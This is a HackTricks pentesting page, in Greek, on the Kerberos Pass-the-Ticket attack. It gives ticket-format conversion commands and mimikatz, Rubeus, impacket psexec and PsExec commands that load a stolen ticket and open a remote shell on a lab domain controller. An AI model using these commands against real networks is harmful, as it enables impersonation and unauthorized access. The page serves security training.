# Pass the Ticket {{#include ../../banners/hacktricks-training.md}} ## Pass The Ticket (PTT) Στη μέθοδο επίθεσης **Pass The Ticket (PTT)**, οι επιτιθέμενοι **κλέβουν το εισιτήριο αυθεντικοποίησης ενός χρήστη** αντί για τον κωδικό πρόσβασης ή τις τιμές hash του. Αυτό το κλεμμένο εισιτήριο χρησιμοποιείται στη συνέχεια για να **παριστάνει τον χρήστη**, αποκτώντας μη εξουσιοδοτημένη πρόσβαση σε πόρους και υπηρεσίες εντός ενός δικτύου. **Διαβάστε**: - [Harvesting tickets from Windows](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md) - [Harvesting tickets from Linux](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md) ### **Swaping Linux and Windows tickets between platforms** Το εργαλείο [**ticket_converter**](https://github.com/Zer1t0/ticket_converter) μετατρέπει τις μορφές εισιτηρίων χρησιμοποιώντας μόνο το ίδιο το εισιτήριο και ένα αρχείο εξόδου. ```bash python ticket_converter.py velociraptor.ccache velociraptor.kirbi Converting ccache => kirbi python ticket_converter.py velociraptor.kirbi velociraptor.ccache Converting kirbi => ccache ``` Στα Windows, το [Kekeo](https://github.com/gentilkiwi/kekeo) μπορεί να χρησιμοποιηθεί. ### Επίθεση Pass The Ticket ```bash:Linux export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass ``` ```bash:Windows #Load the ticket in memory using mimikatz or Rubeus mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi" .\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi klist #List tickets in cache to cehck that mimikatz has loaded the ticket .\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd ``` ## Αναφορές - [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/) {{#include ../../banners/hacktricks-training.md}}